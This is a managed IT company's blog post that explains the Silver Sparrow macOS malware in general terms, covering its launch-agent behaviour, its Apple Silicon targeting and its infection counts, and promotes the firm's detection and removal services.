Silver Sparrow: Things You Did Not Know About MacOS Vulnerability
Just when you think you know all about macOS vulnerability, a new kind of threat comes around. In February 2021, Red Canary engineers discovered a new threat to macOS. This launch agent created by hackers carries out malicious payloads. The discoverers dubbed this new threat Silver Sparrow. The following post describes the import of Silver Sparrow, what sets it apart from other malware, and the steps we are taking to keep systems free from their grasp.
What Is a Launch Agent, and How Does it Affect Silver Sparrow?
A launch agent is a location on the macOS that contains scripts designed to run computer programs in an automated way on certain devices and after the device’s user logs on to initiate a session.
Cyber hackers may create their own version of a launch agent or modify a system’s built-in launch agents. They then use the launch agents to trigger malicious attacks over and over again. The modified launch agents (or disguised launch agents) may act as a sleeper cell on a computer terminal or in a network’s system. It sleeps there unobserved, hiding its malicious code for as little as a few seconds or as long as a few months before it unloads the attack on the unsuspecting network.
Silver Sparrow works a bit differently than other malicious launch agent malware. For one thing, Silver Sparrow uses JavaScript to execute its villainy. It relies on the macOS JavaScript Application Programming Interface (more familiarly known as the API) to execute its commands.
A second reason it is unique has to do with Apple’s new M1 ARM64 architecture, the Apple Silicon Chip. Apple announced in November 2020 that it would transition the macOS platform from Intel processors to its own Apple Silicon Chip. Up until now, there have been few threats against Apple’s Silicon Chip platform because it is so new. That all changed with the discovery of Silver Sparrow. This new virus variant is a direct threat to macOS’s new platform via the universal “bystander binary”. The bystander binary does not immediately interfere with the platform. It stands by until activated by cyber hackers.
How Do Computers Get Infected With Silver Sparrow?
Cybersecurity experts are not sure how the infection process works. The malicious threat actor may hide in compromised ads or websites, fake ads, or fake Flash updates. Its proven global ability to spread infection seems to point to the conclusion that it is not the brainchild of a lone wolf actor.
Cybersecurity experts do not believe this malware attacks platforms other than Macs. There are, however, two versions of the Silver Sparrow malware. One version is for Macs with Intel inside and one is a universal binary that attacks the new Apple Silicon platform.
In addition, thanks to Mac’s Rosetta program, even the Intel-created malware version runs on the Apple Silicon Chip. Rosetta is an application translator to provide compatibility between different platforms. Naturally, the malware developers took advantage of Rosetta’s beneficial properties.
What Does Silver Sparrow Do?
As of February 17, 2021, Silver Sparrow has infected 29,139 macOS remote computing devices in 153 countries. The countries with the heaviest detected infiltration are the US, Germany, UK, Canada, and France. Cybersecurity experts voice their concerns about Silver Sparrow even though no payload has been discovered yet because of the malware:
- Adapts to Apple’s Silicon Chip
- Has already shown global capability
- Has a high infection rate
- Most likely can deliver a significant malicious cargo very quickly and efficiently
This particular malware also removes the installed parts to make the attack persistent. In other words, it can make itself disappear as easily as it appeared — all without leaving a trace behind.
Silver Sparrow’s design looks like the beginnings of a super bot-net. The bots may lie in wait for instructions to drop a malicious payload. At the very least, the malware consumes computer resources. It may also expose network information.
What Can Networks Do to Prevent an Attack?
Apple says that the virus is no longer spreading and that Apple will most likely include protection against the malware in the next version of the Silicon Chip platform.
While waiting for the upgraded platform, however, many small to mid-size businesses in Middle Georgia and Alabama enjoy managed IT services as clients of Acom Integrated. Sparrow targets macOS by using the macOS installer to execute malicious commands that hide in the package. Silver Sparrow tries to look like a normal installation making it difficult for most malware detection engines. We are proud to say that you are in good hands with respect to this latest attack on Macs. Thanks to the security teams of our channel partners, we detect the presence of Silver Sparrow before it harms your system.
Because no one has thus far identified a payload attributable to Silver Sparrow, IT security experts think that this particular malicious actor is still in its development phase. This makes it all the more critical to do something about Silver Sparrow before we hear about payloads being dropped.
The malware removal tool that we use to protect our clients not only detects the appearance of Silver Sparrow, it also prevents the malware from delivering any payload.
Moving Forward
Since experts expect the Silver Sparrow malware to continue evolving, our managed IT service staff keeps their eyes open for signs that Silver Sparrow has finished laying the foundations and is ready to attack. We use the latest malware detection and removal tools, and we continually strive to improve cybersecurity.
If you would like to talk more about this topic or anything else with one of our security experts, please contact us. We look forward to helping you keep your network secure from cyber hackers.
To learn more about Silver Sparrow and Apple’s response, you may enjoy the article from pcmag.com entitled “Apple Takes Action Against Silver Sparrow Malware Discovered on 30K Infected Macs“.